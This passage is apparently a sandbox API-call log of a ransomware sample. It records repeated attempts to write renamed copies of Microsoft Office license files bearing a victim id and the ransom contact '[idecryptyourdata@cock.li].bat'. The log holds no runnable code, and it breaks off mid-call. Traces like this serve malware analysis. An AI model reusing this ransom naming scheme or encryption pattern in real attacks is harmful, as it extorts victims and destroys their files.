SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.536] CloseHandle (hObject=0x52c) returned 1 [0165.537] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.537] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.538] CloseHandle (hObject=0x52c) returned 1 [0165.539] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.539] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.539] CloseHandle (hObject=0x52c) returned 1 [0165.540] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.540] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.540] CloseHandle (hObject=0x52c) returned 1 [0165.541] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.541] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.541] CloseHandle (hObject=0x52c) returned 1 [0165.542] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.542] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.543] CloseHandle (hObject=0x52c) returned 1 [0165.543] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.544] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.544] CloseHandle (hObject=0x52c) returned 1 [0165.545] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.545] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.545] CloseHandle (hObject=0x52c) returned 1 [0165.546] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.546] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.546] CloseHandle (hObject=0x52c) returned 1 [0165.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.547] CloseHandle (hObject=0x52c) returned 1 [0165.548] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.548] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.548] CloseHandle (hObject=0x52c) returned 1 [0165.551] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.551] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.551] CloseHandle (hObject=0x52c) returned 1 [0165.552] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.552] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.552] CloseHandle (hObject=0x52c) returned 1 [0165.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.553] CloseHandle (hObject=0x52c) returned 1 [0166.018] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.018] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.205] CloseHandle (hObject=0x528) returned 1 [0166.206] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.206] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.206] CloseHandle (hObject=0x528) returned 1 [0166.207] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.207] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.207] CloseHandle (hObject=0x528) returned 1 [0166.208] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.208] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.208] CloseHandle (hObject=0x528) returned 1 [0166.209] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.209] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.209] CloseHandle (hObject=0x528) returned 1 [0166.210] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.210] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.210] CloseHandle (hObject=0x528) returned 1 [0166.211] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.211] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.212] CloseHandle (hObject=0x528) returned 1 [0166.212] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.212] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.213] CloseHandle (hObject=0x528) returned 1 [0166.213] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.213] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.214] CloseHandle (hObject=0x528) returned 1 [0166.214] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.214] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.215] CloseHandle (hObject=0x528) returned 1 [0166.215] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.215] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.216] CloseHandle (hObject=0x528) returned 1 [0166.216] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.216] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.216] CloseHandle (hObject=0x528) returned 1 [0166.217] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.217] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.218] CloseHandle (hObject=0x528) returned 1 [0166.218] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.218] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.218] CloseHandle (hObject=0x528) returned 1 [0166.219] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.219] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.219] CloseHandle (hObject=0x528) returned 1 [0166.220] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.220] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.221] CloseHandle (hObject=0x528) returned 1 [0166.221] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.221] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.222] CloseHandle (hObject=0x528) returned 1 [0166.223] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.223] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, 